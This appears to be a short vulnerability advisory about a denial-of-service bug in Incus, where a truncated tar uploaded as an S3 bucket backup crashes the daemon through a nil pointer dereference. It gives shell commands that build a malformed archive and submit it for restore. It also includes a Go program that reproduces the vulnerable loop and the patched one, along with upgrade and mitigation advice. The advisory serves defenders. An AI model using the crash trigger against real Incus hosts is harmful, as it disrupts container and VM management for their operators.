Incus, Nil Pointer Dereference (medium)


How the CVE works:

The vulnerability exists in Incus's S3 bucket restore functionality, specifically in `TransferManager.UploadAllFiles` (file `transfer_manager.go`). When importing a storage bucket backup as a tar archive, the code iterates over tar entries by calling `tr.Next()` inside a loop. The loop checks only for `io.EOF` to terminate normally. If `tr.Next()` returns any other error, such as `io.ErrUnexpectedEOF` from a truncated or corrupted archive, the returned header `hdr` is nil. The code does not check for non-EOF errors and proceeds to dereference `hdr.Name` (for example, to skip `backup/index.yaml`). This is a nil pointer dereference, which panics and crashes the Incus daemon. An authenticated user can trigger it by supplying a malformed backup file during an S3 bucket restore; the result is a denial of service. The affected loop is visible in the upstream patch diff. A fuzz test confirms the panic: `go test ./test/fuzz -run='FuzzS3BucketUploadTarParsing/s3_nil_deref_truncated_tar'` produces a runtime nil pointer dereference. The fix adds an explicit error check after `tr.Next()`, returning a formatted error instead of dereferencing nil. The patch was released in Incus v7.0.0.

DailyCVE form (3 words max per line):

Platform: Incus container
Version: v6.22.0
Vulnerability: Nil pointer dereference
Severity: Medium
Date: 2025-05-04

Prediction: Patch already out

What Undercode Say:

Identify affected version:

```shell
incus --version | grep "6.22.0"
```

Simulate truncated tar (proof of concept):

```shell
dd if=/dev/zero of=bad.tar bs=512 count=1
truncate -s 256 bad.tar
incus storage bucket restore mybucket ./bad.tar
```

Exploit:

An authenticated user uploads a truncated or corrupted tar archive as an S3 bucket backup. The daemon reads the first entry; on the second call, `tr.Next()` returns `io.ErrUnexpectedEOF` with a nil `hdr`, and dereferencing `hdr.Name` panics, crashing the daemon.
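The following Go program is an added example, not Incus source code: it reconstructs the loop shape described in "How the CVE works" and in the exploit summary above, places the unchecked pre-patch pattern beside the patched pattern, and feeds both a constructed in-memory tar stream that is cut off in the middle of its second header (the same condition a truncated upload produces). The entry names and the `restoreVulnerable`/`restoreFixed` function names are assumptions chosen for the illustration; the `recover` in the vulnerable variant exists only so the panic can be observed as a return value instead of ending the process.

```go
package main

import (
	"archive/tar"
	"bytes"
	"errors"
	"fmt"
	"io"
)

// must aborts on unexpected errors while building the sample input.
func must(err error) {
	if err != nil {
		panic(err)
	}
}

// buildTar returns a constructed sample archive (not a real Incus backup): one
// regular entry named like the Incus index file followed by one data entry.
// With truncated=true the stream is cut in the middle of the second header
// block, so tar.Reader.Next() fails with io.ErrUnexpectedEOF instead of io.EOF.
func buildTar(truncated bool) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	body := []byte("first entry\n")
	must(tw.WriteHeader(&tar.Header{Name: "backup/index.yaml", Typeflag: tar.TypeReg, Mode: 0644, Size: int64(len(body))}))
	_, err := tw.Write(body)
	must(err)
	must(tw.WriteHeader(&tar.Header{Name: "data/object.bin", Typeflag: tar.TypeReg, Mode: 0644, Size: 0}))
	must(tw.Close())
	data := buf.Bytes()
	if truncated {
		// Tar blocks are 512 bytes: header (512) + padded body (512) = 1024 bytes
		// for the first entry; keep only half of the second entry's header.
		return data[:1024+256]
	}
	return data
}

// restoreVulnerable reconstructs the pre-patch control flow described for
// UploadAllFiles (illustrative, not Incus source): only io.EOF ends the loop,
// so any other error leaves hdr nil and hdr.Name dereferences it. The recover
// turns the resulting panic into a boolean so the behaviour can be observed.
func restoreVulnerable(r io.Reader) (names []string, panicked bool) {
	defer func() {
		if rec := recover(); rec != nil {
			panicked = true
		}
	}()
	tr := tar.NewReader(r)
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		}
		// BUG: err may be io.ErrUnexpectedEOF here while hdr == nil.
		if hdr.Name == "backup/index.yaml" { // nil pointer dereference on a truncated archive
			continue
		}
		names = append(names, hdr.Name)
	}
	return names, false
}

// restoreFixed applies the patched pattern: every non-EOF error from Next()
// is returned to the caller before hdr is touched.
func restoreFixed(r io.Reader) ([]string, error) {
	tr := tar.NewReader(r)
	var names []string
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			break
		}
		if err != nil {
			return nil, fmt.Errorf("failed reading tar entry: %w", err)
		}
		if hdr.Name == "backup/index.yaml" {
			continue
		}
		names = append(names, hdr.Name)
	}
	return names, nil
}

func main() {
	data := buildTar(true)
	_, panicked := restoreVulnerable(bytes.NewReader(data))
	fmt.Println("vulnerable loop panicked:", panicked)
	_, err := restoreFixed(bytes.NewReader(data))
	fmt.Println("fixed loop returned error:", err, "| unexpected EOF:", errors.Is(err, io.ErrUnexpectedEOF))
	names, _ := restoreFixed(bytes.NewReader(buildTar(false)))
	fmt.Println("intact archive entries:", names)
}
```

The truncated input makes `archive/tar`'s `Next()` fail inside `io.ReadFull` on the half-present header block, which is exactly the non-EOF error path the original loop never checked; the patched loop converts it into a wrapped error the caller can report, and `errors.Is` still recognises `io.ErrUnexpectedEOF` through the wrap.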

Protection from this CVE:

Upgrade to Incus v7.0.0 or later (patch included). If unable to upgrade, restrict S3 bucket restore permissions to trusted users only, and validate backup archives before import by listing them with `tar -tf`, which fails on a truncated archive.

Impact:

Denial of service (daemon crash). No privilege escalation or data corruption. Requires authenticated access to Incus API. Crash disrupts container and VM management until daemon restarts.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
